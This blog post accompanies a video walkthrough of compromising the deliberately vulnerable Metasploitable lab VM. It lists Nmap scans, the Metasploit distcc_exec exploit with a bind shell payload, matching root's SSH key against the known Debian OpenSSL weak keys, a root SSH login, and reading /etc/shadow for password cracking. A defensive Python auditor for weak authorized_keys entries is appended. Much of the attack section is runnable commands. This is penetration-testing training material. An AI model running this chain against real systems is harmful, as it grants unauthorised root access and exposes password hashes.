Metasploitable – DistCC

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3826063
Download video: http://www.mediafire.com/?imgdyq4diwm
Download (debian_ssh_rsa_2048_x86.tar.bz2): http://www.mediafire.com/?i2mnwymzt51

What is this?
This video demonstrates an attack on the DistCC service on the metasploitable hackable box.

“Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.” – blog.metasploit.com

“distcc is a program to distribute builds of C, C++, Objective C or Objective C++ code across several machines on a network. distcc should always generate the same results as a local build, is simple to install and use, and is usually much faster than a local compile” – distcc.samba.org

Guide
> Use Nmap to scan the network (gathering information)
> Use Nmap to do a more detailed scan of the target (gathering information)
> Use Metasploit to send a payload (remote access)
> *I cheated a little bit here as I had used nessus in a previous scan to discover Debian OpenSSH/OpenSSL Package Random Number Generator Weakness*
> Via the payload it is possible to capture the SSH Key and compare it against the weak keys *Just like pWnOS* (escalating privileges)
> Connect via SSH as root (complete access)
> Prove complete access by cracking the shadow file with John The Ripper (then prove it by connecting via SSH using one of the newly acquired accounts)

What do I need?
> Nmap — on Backtrack 4 (Final)
> Metasploit — on Backtrack 4 (Final)
> SSH — on Backtrack 4 (Final)
> Weak SSH Keys (debian_ssh_rsa_2048_x86.tar.bz2) http://www.mediafire.com/?i2mnwymzt51
> Metasploitable.vmdk (SHA-1: 7DF98130DAC3167690209716EBF86047C6B9672F)

> Metasploitable.part01.rar ~ http://www.mediafire.com/?dy2jl2wmw5h (SHA-1: 76388A5648ADAAAE9E5841AB5B0F660777A28E36)
> Metasploitable.part02.rar ~ http://www.mediafire.com/?3zrz2wjmjmz (SHA-1: 48B9807812CE7561C5F86667630B9E40D3DD85FA)
> Metasploitable.part03.rar ~ http://www.mediafire.com/?nmjmyimmqwm (SHA-1: EAAA89F4A24F3B37C27ACECD8580CE95EC39BA34)
> Metasploitable.part04.rar ~ http://www.mediafire.com/?gdjyzfjyjzm (SHA-1: FB1CDD02115F43AC53FDDA9499F1ED8ED2BF5EE2)

Commands :

nmap 192.168.1.1/24
nmap -sS -sV -p1-65535 -O -f -n -v 192.168.1.105
msfconsole
search distcc
use exploit/unix/misc/distcc_exec
show options
setg RHOST 192.168.1.105
show payloads
setg payload generic/cmd/unix/bind_perl
show options
exploit
ls
whoami
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) -> http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow
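
The authorized_keys comparison in the commands above works because every key the flawed Debian OpenSSL package could generate is already known. The following added example (not part of the original post or video) runs the same comparison as an audit, so that matching entries can be found and removed from a host. Assumptions: the blacklist is a caller-supplied set of MD5 fingerprints of known-weak public keys, and the function names, blobs and sample file are constructed for illustration.

```python
import base64
import binascii
import hashlib
import re

# Key type followed by its base64 blob; text before it on the line is options,
# text after it is the free-form comment. The Debian flaw affected RSA and DSA keys.
KEY_RE = re.compile(
    r"(?:^|\s)(ssh-rsa|ssh-dss)\s+([A-Za-z0-9+/]+={0,2})(?:\s+(.*))?$"
)


def md5_fingerprint(b64_blob):
    """Return the MD5 fingerprint (32 hex chars) of a base64 public-key blob."""
    raw = base64.b64decode(b64_blob, validate=True)
    return hashlib.md5(raw).hexdigest()


def audit_authorized_keys(text, weak_fingerprints):
    """Return (line number, key type, fingerprint, comment) for each weak key."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue  # blank line or comment
        match = KEY_RE.search(line)
        if not match:
            continue  # no RSA/DSA key on this line
        key_type, blob, comment = match.groups()
        try:
            fingerprint = md5_fingerprint(blob)
        except (binascii.Error, ValueError):
            continue  # malformed base64, sshd would ignore the entry as well
        if fingerprint in weak_fingerprints:
            findings.append((lineno, key_type, fingerprint, comment or ""))
    return findings


# Constructed sample data: these blobs are placeholders, not real SSH keys.
WEAK_BLOB = base64.b64encode(b"constructed weak key material").decode()
GOOD_BLOB = base64.b64encode(b"constructed strong key material").decode()
SAMPLE = (
    "# constructed authorized_keys sample\n"
    f"ssh-rsa {GOOD_BLOB} admin@build\n"
    f'from="192.168.1.0/24",no-pty ssh-rsa {WEAK_BLOB} msfadmin@metasploitable\n'
)
BLACKLIST = {md5_fingerprint(WEAK_BLOB)}  # hypothetical blacklist for the demo

if __name__ == "__main__":
    for hit in audit_authorized_keys(SAMPLE, BLACKLIST):
        print("weak key on line %d: %s %s (%s)" % hit)
```

Any entry this reports should be removed from authorized_keys and the key pair regenerated on a patched system.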

Notes:
Song: Josh Abrahams – Joker
Video length: 4:51
Capture length: 6:28

Blog Post: http://g0tmi1k.blogspot.com/2010/07/video-metasploitable-distcc.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/30079-%5Bvideo%5D-metasploitable-distcc.html#post167045
